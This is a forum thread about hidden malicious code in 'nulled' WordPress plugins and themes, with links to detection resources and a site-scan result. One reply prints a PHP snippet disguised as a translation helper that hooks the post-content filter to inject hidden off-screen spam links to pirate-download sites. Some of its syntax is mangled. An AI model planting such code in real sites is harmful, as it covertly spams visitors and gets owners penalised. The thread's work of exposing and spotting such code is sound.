PHP Malicious code in plugin or theme that Virustotal or Security software can't detect

***Lumos*** · (This post was last modified: 04-22-2019 02:03 PM by Lumos.)

Bad stuff !!
Why don't the AVs pick up on it;
Or...
Why isn't there a scanner for this sort of thing for those of us who aren't sure of what to look for in supposedly 'nulled' things ??
Thanks

***jazz1611*** · 04-22-2019, 02:58 PM

PHP Code:

<?php

/**
 * Helper function for translation.
 */

if (!function_exists('sanitize_context_zero')) {
    function sanitize_context_zero($input) {
        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
        $i = 0;
        $output = "";
        $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
        do {
            $enc1 = strpos($keyStr, substr($input, $i++, 1));
            $enc2 = strpos($keyStr, substr($input, $i++, 1));
            $enc3 = strpos($keyStr, substr($input, $i++, 1));
            $enc4 = strpos($keyStr, substr($input, $i++, 1));
            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $chr2 = (($enc2 and 15) << 4) | ($enc3 >> 2);
            $chr3 = (($enc3 and 3) << 6) | $enc4;
            $output = $output . chr((int)$chr1);
            if ($enc3 != 64) {
                $output = $output . chr((int)$chr2);
            }

            if ($enc4 != 64) {
                $output = $output . chr((int)$chr3);
            }

            $chr1 = $chr2 = $chr3 = "";
            $enc1 = $enc2 = $enc3 = $enc4 = "";
        }

        while ($i < strlen($input));
        return urldecode($output);
    }
}

if ( ! function_exists('safemodecc') ) {
    
    function safemodecc( $content ) {

        if ( is_single() and& ! is_user_logged_in() and& ! is_feed() and& ! stristr( $_SERVER['REQUEST_URI'], "amp") ) {

            $divclass = sanitize_context_zero("<div style="position:absolute; top:0; left:-9999px;">");
            $array = Array(
                    sanitize_context_zero("Free Download WordPress Themes"),
                    sanitize_context_zero("Download Premium WordPress Themes Free"),
                    sanitize_context_zero("Download WordPress Themes"),
                    sanitize_context_zero("Download WordPress Themes Free"),
                    sanitize_context_zero("Download Nulled WordPress Themes"),
                    sanitize_context_zero("Download Best WordPress Themes Free Download"),
                    sanitize_context_zero("Premium WordPress Themes Download")
            );
            $array2 = Array(
                    sanitize_context_zero("free download udemy paid course"),
                    sanitize_context_zero("udemy paid course free download"),
                    sanitize_context_zero("download udemy paid course for free"),
                    sanitize_context_zero("free download udemy course"),
                    sanitize_context_zero("udemy course download free"),
                    sanitize_context_zero("online free course"),
                    sanitize_context_zero("free online course"),
                    sanitize_context_zero("download lynda course free"),
                    sanitize_context_zero("lynda course free download"),
                    sanitize_context_zero("udemy free download")
            );
            $array3 = Array(
                    sanitize_context_zero("download mobile firmware"),
                    sanitize_context_zero("download samsung firmware"),
                    sanitize_context_zero("download micromax firmware"),
                    sanitize_context_zero("download intex firmware"),
                    sanitize_context_zero("download redmi firmware"),
                    sanitize_context_zero("download xiomi firmware"),
                    sanitize_context_zero("download lenevo firmware"),
                    sanitize_context_zero("download lava firmware"),
                    sanitize_context_zero("download karbonn firmware"),
                    sanitize_context_zero("download coolpad firmware"),
                    sanitize_context_zero("download huawei firmware")
            );

            $abc1 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.thewpclub.net").'">' . $array[array_rand($array) ] . '</a></div>';
            $abc2 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.themeslide.com").'">' . $array[array_rand($array) ] . '</a></div>';
            $abc3 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.script-stack.com").'">' . $array[array_rand($array) ] . '</a></div>';
            $abc4 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.thememazing.com").'">' . $array[array_rand($array) ] . '</a></div>';
            $abc5 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.onlinefreecourse.net").'">' . $array2[array_rand($array2) ] . '</a></div>';
            $abc6 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.frendx.com/firmware/").'">' . $array3[array_rand($array3) ] . '</a></div>';
            $abc7 = '' . $divclass . '<a href="'.sanitize_context_zero("https://www.themebanks.com").'">' . $array[array_rand($array) ] . '</a></div>';
            $abc8 = '' . $divclass . '<a href="'.sanitize_context_zero("https://downloadtutorials.net").'">' . $array2[array_rand($array2) ] . '</a></div>';

            $fullcontent = $content.$abc1.$abc2.$abc3.$abc4.$abc5.$abc6.$abc7.$abc8;

        } else {
        
            $fullcontent = $content;

        }

        return $fullcontent;

    }
}
    [/code]
if ( ! has_filter( 'the_content', 'safemodecc' ) ) {
    add_filter('the_content', 'safemodecc');
} 

***Massblack*** · 04-22-2019, 03:17 PM

I had a plugin installed for a year with no issues then one day it activated and google banned my shared server account based on one website. Reason enough for me.....
MassBlack

***xiaofang*** · (This post was last modified: 04-24-2019 11:23 PM by xiaofang.)

Maybe some of this is good to use and check with
https://www.hongkiat.com/blog/wordpress-...ous-codes/

Normalized URL: http://bestblackhatforum.com:80
Submission date: Wed Apr 24 13:18:37 2019
Server IP address: 104.18.48.93
Country: United States
Server: cloudflare
Malicious files: 0
Suspicious files: 0
Potentially Suspicious files: 0
Clean files: 94
External links detected: 290
Iframes scanned: 0
Blacklisted: No

***Lumos*** · (This post was last modified: 04-25-2019 11:17 AM by Lumos.)

Interesting addition by Xiaofang - Thanks

Attached is that site's page as a short PDF with all the excess blogging adverts, etc. removed.

Perhaps it will help some folks to better secure their WP sites.

Source from above reply:

Code:

https://www.hongkiat.com/blog/wordpress-plugins-detect-malicious-codes/

***tompk242*** · 05-15-2019, 01:26 PM

Just update the url and decode site at 1st post

***ruanjiandiguo*** · 05-24-2019, 06:30 PM

thanks man. Just added this site https://www.thewpclub.net/ into my block list.